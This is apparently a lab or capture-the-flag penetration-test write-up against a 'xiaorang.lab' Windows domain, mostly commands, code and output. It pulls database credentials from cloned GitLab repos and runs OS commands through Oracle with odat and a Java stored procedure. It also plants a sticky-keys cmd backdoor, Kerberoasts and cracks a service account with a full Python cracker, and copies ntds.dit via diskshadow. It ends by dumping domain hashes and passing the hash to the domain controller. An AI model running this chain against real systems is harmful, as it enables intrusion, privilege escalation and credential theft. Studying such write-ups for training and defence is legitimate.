        "path_with_namespace": "gitlab-instance-23352f48/Monitoring",
        "created_at": "2022-12-25T07:18:20.914Z",
        "default_branch": "main",
        "tag_list": [

        ],
        "topics": [

        ],
        "ssh_url_to_repo": "[email protected]:gitlab-instance-23352f48/Monitoring.git",
        "http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
        "web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
        "readme_url": null,
        "avatar_url": null,
        "forks_count": 0,
        "star_count": 0,
        "last_activity_at": "2022-12-25T07:18:20.914Z",
        "namespace": {
            "id": 2,
            "name": "GitLab Instance",
            "path": "gitlab-instance-23352f48",
            "kind": "group",
            "full_path": "gitlab-instance-23352f48",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
        },
        "_links": {
            "self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
            "issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
            "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
            "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
            "labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
            "events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
            "members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
            "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": true,
        "archived": false,
        "visibility": "internal",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2022-12-26T07:18:21.108Z"
        },
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "operations_access_level": "enabled",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "emails_disabled": null,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_status": "none",
        "open_issues_count": 0,
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_opt_in_jwt": false,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "public_jobs": true,
        "build_timeout": 3600,
        "auto_cancel_pending_pipelines": "enabled",
        "ci_config_path": null,
        "shared_with_groups": [

        ],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "restrict_user_defined_variables": false,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "autoclose_referenced_issues": true,
        "keep_latest_artifact": true,
        "runner_token_expiration_interval": null,
        "permissions": {
            "project_access": null,
            "group_access": null
        }
    }
]

Clone these three projects:

git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/internal-secret.git
git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xradmin.git
git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xrwiki.git

This yields the configuration:

cat application-druid.yml
# Data source configuration
spring:
    datasource:
        type: com.alibaba.druid.pool.DruidDataSource
        driverClassName: oracle.jdbc.driver.OracleDriver
        druid:
            # Master data source
            master:
                url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
                username: xradmin
                password: fcMyE8t9E4XdsKf
            # Slave data source
            slave:
                # Slave data source switch, off by default
                enabled: false
                url: 
                username: 
                password: 
            # Initial number of connections
            initialSize: 5
            # Minimum pool size
            minIdle: 10
            # Maximum pool size
            maxActive: 20
            # Timeout when waiting to obtain a connection
            maxWait: 60000
            # Interval between checks for idle connections that should be closed, in milliseconds
            timeBetweenEvictionRunsMillis: 60000
            # Minimum time a connection lives in the pool, in milliseconds
            minEvictableIdleTimeMillis: 300000
            # Maximum time a connection lives in the pool, in milliseconds
            maxEvictableIdleTimeMillis: 900000
            # Query used to check that a connection is still valid
            validationQuery: SELECT 1 FROM DUAL
            testWhileIdle: true
            testOnBorrow: false
            testOnReturn: false
            webStatFilter: 
                enabled: true
            statViewServlet:
                enabled: true
                # Allow list; if left empty, all access is allowed
                allow:
                url-pattern: /druid/*
                # Console admin username and password
                login-username: 
                login-password: 
            filter:
                stat:
                    enabled: true
                    # Slow SQL logging
                    log-slow-sql: true
                    slow-sql-millis: 1000
                    merge-sql: true
                wall:
                    config:
                        multi-statement-allow: true

jdbc:oracle:thin:@172.22.14.31:1521/orcl

xradmin:fcMyE8t9E4XdsKf

Connect with odat.

It is the x64 build, so I dropped it on the server; docker would probably work too.

proxychains ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user dionysus QWE123qwe. /add' 

proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators dionysus /add'

Pick this option manually and Navicat connects.

select * from v$version;

Run the following in order:

# Oracle command execution through a Java stored procedure

begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete');end;



begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');end;


begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );end;
declare sql_command varchar2(32767);
begin sql_command := 'create or replace and compile java source named "Command"
as
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
public class Command {
    public static String exec(String cmd) throws Exception{
        Process process = Runtime.getRuntime().exec(cmd);
        InputStream input = process.getInputStream();
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        int n;
        byte[] buffer = new byte[1024];
        // copy only the n bytes actually read; writing the whole buffer
        // would append stale bytes from earlier reads to the output
        while ((n = input.read(buffer)) != -1) {
            baos.write(buffer, 0, n);
        }
        input.close();
        return baos.toString();
    }
}';
execute immediate sql_command;
end;
create or replace function rbexec(cmd varchar2) return varchar2 as language java name 'Command.exec(java.lang.String) return java.lang.String';
select rbexec('whoami') from dual;

Commands can now be run through rbexec; add a user first:

net user dionysus QWE123qwe. /add
net localgroup administrators dionysus /add

Bring up Viper and grab the second flag.

A lot of the earlier git repos still contain useful material.

It goes like this, using evil-winrm.

The evil-winrm session seems to have fairly high privileges.

ren sethc.exe sethc.bak
ren cmd.exe sethc.exe

Press Shift five times at the lock screen and a cmd pops up directly.

Bring up Viper; only the last box, the domain controller, is left.

Renaming cmd is presumably what made mimikatz throw all kinds of errors later; rename it back first.

ren sethc.exe cmd.exe

Then the hash was obtained successfully (the NT hash of the machine account XR-0923$):

:bb20f831c1950cb4d14832b87ae0f48d

proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':bb20f831c1950cb4d14832b87ae0f48d' -dc-ip 172.22.14.11


[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  8.149.142.195:7777  ...  172.22.14.11:389  ...  OK
ServicePrincipalName           Name      MemberOf                                                  PasswordLastSet             LastLogon  Delegation 
-----------------------------  --------  --------------------------------------------------------  --------------------------  ---------  ----------
TERMSERV/xr-0923.xiaorang.lab  tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 18:25:11.564883  <never>               
WWW/xr-0923.xiaorang.lab/IIS   tianjing  CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab  2023-05-30 18:25:11.564883  <never>     

Two SPNs are registered for the user tianjing.

Request the TGS and grab the hash:

proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':bb20f831c1950cb4d14832b87ae0f48d' -dc-ip 172.22.14.11 -request-user tianjing
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$bf879e774759456daf103777ad9af90d$4a4de18d66ea3c67bae2249d6f7111fb129dc414e16f7919032694689c5dfa24d6812ccb0bd2b41adf6750d65c0b463f8fec3dea3102dbb2aec81bd4709e5d8220f10170f25b40706c3595c26c9270e3ee74c55a2c3bf8a331afb9f258b56c75a33d4d1eb917a5f42ccb0e314038fe0d81a939f87514722111263df070a8add429e99817cc568e6dd7a8631f054fd844048adf050bfb1deb50634bdd55942225f10b79d6996d781a5027b36c951ff207ca0d1d14b90d1e7d6542abb7930a311bdf3c70711819f503d8b7e1177017299b8d594efbb7453ff63b7e834192896905ad9dcf2d56d62f9882b96b4eebf111bc719ba3dfda365b9e8b4066a3a8f04453f54f5fab6278c7e8ddff61f26cb6040baac01e7831390c3eafc26c8cda1064bb5a315c2224bc891a88f9db904861f1085e7d899720599936c9027b05f5198e3f0fea64e2920be2e8dbc97735667104e7d60658c178c5721433e9a2270ed2b5c5f66364da1778d8a790075cd069d74af8a44a78dd0888792a737fbbde5350120ff962e4925688177b47bec14762c24adb311506a7ac0f23ee5e780828f953c84c8629380755777f439a183cbc803d7f53f6715ea0603f6720f7035fcb931b51405f31d444a4a54978c0b9827ff41f0a47d97ba6547d3e2ff3dfabab9d7d276f7dd757fa1b706cfbf377d77d35d24023f32686944faf69d1aedf00e786ee01b85fd8adfc0f8d8c25fb4e0f58780a0290e45a40f5cf75a0af127b9d9481a92f78926a9498deea1e9f60c9216cb806a409718501bee7841dd4267ef636c37f1f17454a71c5f67555df6bbb5f2d947ff79090713e3155bdfef57c117940a48db78089b6be20903fe6d66426f839332a3ba209e5503cff4881d5c98573b7639ba9ed68f64d073a3d095694a19c08bfc9ca9efcc2dd9fbac00dea0c892f576a73132d705d4ff6f370098bb6cdd5986af2fc7d201431561476ddef1df74c8915943cf014c4c41e201025445898eded8720a9376da287a297ff8ab2a8f349ebff00724a5c5fd421103002a7b1581f4d687b07287c64d504ab4e884e362ced5cfa772c5a6bd6eb3e427a988f10cc6a3cecfd635a1b71a4a2005221733aeb5b69174253c08b6dd38468278ed4f28fc2a70f6c0aad0f6148c5a7456512669677b42ae75cf6612709f93ba69b994e8c6d806d9dbe2b90f9a91f7f412b9759ecb07eec4d5d94b089af36ecabc8bb11209d880b41c766bc043d59c3733871d6ce2b836392cab76082624633167e1604756d47a84c36fe3833341f6abc9a25fefb5e125128c3e5b96df7b6427ee246d6015c976988c8799934d961f5ffa780f5eb586c15f8de35a90637d568b4f47dff3aa864489d28cbfb61a0b7f8106cde05160ae36549589b72f74a59bf70942ae81e1a78b92abf7b32232b0496481dc0d9cb0c931613bd2ade64073f1f90760e7b4b977d71cdfeb0c2aebf14c62d

Crack it offline:

hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force

DPQSXSXgh2
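The hashcat run above is the offline half of Kerberoasting. As an added example that is not part of the original write-up, the Python below implements the same check hashcat -m 13100 performs for every candidate: derive the RC4-HMAC (etype 23) key from the candidate's NT hash, decrypt the ticket's encrypted part, and compare HMAC-MD5 of the plaintext against the checksum carried in the $krb5tgs$23$ line. The ticket body, password and wordlist are constructed here (only the user and SPN names are copied from the GetUserSPNs output); MD4 and RC4 are implemented inline so the script runs without OpenSSL's legacy provider.

```python
import hashlib
import hmac
import os
import struct

KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage number for the ticket's encrypted part


def _rol(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 by hand; hashlib.md4 is missing on OpenSSL 3 builds without the legacy provider."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a, b, c, d = d, _rol(a + f(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, _rol(a + g(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, _rol(a + (b ^ c ^ d) + X[k3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash is MD4 over the UTF-16LE password; it is the etype-23 Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(nt: bytes, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext) with K3 = HMAC(K1, checksum)."""
    confounder = confounder or os.urandom(8)
    k1 = _hmac_md5(nt, struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
    edata = confounder + plaintext
    checksum = _hmac_md5(k1, edata)
    return checksum + rc4(_hmac_md5(k1, checksum), edata)


def format_krb5tgs(user: str, realm: str, spn: str, blob: bytes) -> str:
    """hashcat -m 13100 line layout: $krb5tgs$23$*user$REALM$spn*$checksum$edata."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def parse_krb5tgs(line: str):
    head, _, tail = line.partition("*$")
    if not head.startswith("$krb5tgs$23$*"):
        raise ValueError("not an etype-23 krb5tgs line")
    checksum_hex, edata_hex = tail.split("$")
    return bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_candidate(line: str, password: str) -> bool:
    """One hashcat guess: derive K1/K3 from the candidate's NT hash, decrypt, verify the HMAC."""
    checksum, edata = parse_krb5tgs(line)
    k1 = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
    plaintext = rc4(_hmac_md5(k1, checksum), edata)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def crack(line: str, wordlist):
    return next((w for w in wordlist if check_candidate(line, w)), None)


# Constructed sample, not real ticket material: a fake ticket body encrypted under a
# made-up password for the SPN seen above, then recovered from a three-word list.
SAMPLE_PASSWORD = "Summer2023!"
SAMPLE_LINE = format_krb5tgs(
    "tianjing", "XIAORANG.LAB", "xiaorang.lab/tianjing",
    rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), b"\x63\x82\x04\x00fake-EncTicketPart" * 8, confounder=b"\x00" * 8),
)
SAMPLE_WORDLIST = ["password", "DPQSXSXgh2", SAMPLE_PASSWORD]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

check_candidate can be pointed at the real $krb5tgs$23$ line above with DPQSXSXgh2 to reproduce the hashcat result. The encrypt side shows why this attack is entirely offline: after the single TGS request nothing touches the DC, and the check costs one MD4, three HMAC-MD5s and one RC4 per guess. The practical mitigations are long random service-account passwords (or gMSAs) and removing RC4 from the service account's supported encryption types so the TGS is issued with AES.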

With the password in hand, move laterally straight to the DC:

evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

Logged in to the domain controller.

The account holds the "Back up files and directories" and "Restore files and directories" privileges (SeBackupPrivilege/SeRestorePrivilege), so we can take a volume shadow copy and read the SAM (the SAM, the Security Account Manager database, holds local users and groups including their password hashes and other attributes, under HKLM\SAM in the registry). On a domain controller the domain hashes live in ntds.dit rather than the SAM, so the shadow copy below is used to grab ntds.dit together with the SYSTEM hive that holds the boot key needed to decrypt it.

reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

Write a diskshadow script (raj.dsh) with the following content:

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

Convert it to Windows line endings: unix2dos raj.dsh

Then upload and run it:

upload /home/kali/copy_website/raj.dsh
diskshadow /s raj.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: XR-DC, 2024/4/19 17:36:04

-> set context persistent nowriters
-> add volume c: alias raj
-> create
Alias raj for shadow ID {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {fe1ac6e2-a342-4889-bef1-09aa8825f758} set as environment variable.

Querying all shadow copies with the shadow copy set ID {fe1ac6e2-a342-4889-bef1-09aa8825f758}

  * Shadow copy ID = {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b}      %raj%
    - Shadow copy set: {fe1ac6e2-a342-4889-bef1-09aa8825f758}  %VSS_SHADOW_SET%
    - Original count of shadow copies = 1
    - Original volume name: \\?\Volume{4790f32e-0000-0000-0000-100000000000}\ [C:\]
    - Creation time: 2024/4/19 17:36:05
    - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
    - Originating machine: XR-DC.xiaorang.lab
    - Service machine: XR-DC.xiaorang.lab
    - Not exposed
    - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
    - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %raj% z:
-> %raj% = {7b6bd5cf-e02f-4703-a9fd-66030cd8db7b}
The shadow copy was successfully exposed as z:\.
->

Copy ntds.dit out of the shadow copy into the current directory (RoboCopy /b uses backup semantics, which is exactly what SeBackupPrivilege grants):

RoboCopy /b z:\windows\ntds . ntds.dit

impacket-secretsdump -ntds ntds.dit -system system local

proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277

Domain controller taken. This round was all about privileges.

p4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277 [email protected] -codec gbk